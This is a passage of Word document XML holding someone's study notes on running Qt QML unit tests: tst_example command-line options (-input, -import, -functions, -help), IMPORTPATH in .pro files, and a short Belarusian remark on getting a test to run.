          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-input</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>option. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tst_example </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input data</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test</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qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tst_example </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input </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;full_path&gt;</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test</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qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Specifying the full path to the qml test file is for example needed </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for shadow builds</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If your test case needs QML imports, then you can add them as</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-import</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>options to the test program command-line</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMPORTPATH</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is specified in your .pro file, each import path added to IMPORTPATH will be passed as a command-line argument when the test is run using "make check":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTPATH </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 xml:space="preserve"> $$PWD</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imports</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my_module1 $$PWD</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imports</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my_module2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command-line option will return a list of the current tests functions. It is possible to run a single test function using the name of the test function as an argument. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tst_example </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Test_Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-help</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command-line option will return all the options available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="002E1325" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tst_example </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRDefault="00546121" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F2D7E" w:rsidRDefault="00A724CC" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="005F2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">атрымалася запусціць тэст. Для гэтага я стварыў праект, дзе быў </w:t>
      </w:r>
      <w:r w:rsidR="005F2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cpp</w:t>
      </w:r>
      <w:r w:rsidR="005F2D7E" w:rsidRPr="005F2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">файл з тымі двума радкамі, што вышэй. А </w:t>
      </w:r>
      <w:r w:rsidR="005F2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005F2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> файлы абавязкова павінны мець фармат </w:t>
      </w:r>
      <w:r w:rsidR="005F2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tst</w:t>
      </w:r>
      <w:r w:rsidR="005F2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>_*</w:t>
      </w:r>
      <w:r w:rsidR="005F2D7E" w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005F2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005F2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F2D7E" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1936" w:history="1">
        <w:r w:rsidR="00302D13" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qml-qttest-testcase.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRDefault="00302D13" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Represents a unit test case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00A724CC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1576" w:name="_Toc483000872"/>
      <w:bookmarkStart w:id="1577" w:name="_Toc483003865"/>
      <w:bookmarkStart w:id="1578" w:name="_Toc483604217"/>
      <w:bookmarkStart w:id="1579" w:name="_Toc483605437"/>
      <w:r w:rsidRPr="00A724CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction to QML test cases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1576"/>
      <w:bookmarkEnd w:id="1577"/>
      <w:bookmarkEnd w:id="1578"/>
      <w:bookmarkEnd w:id="1579"/>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Test cases are written as JavaScript functions within a</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
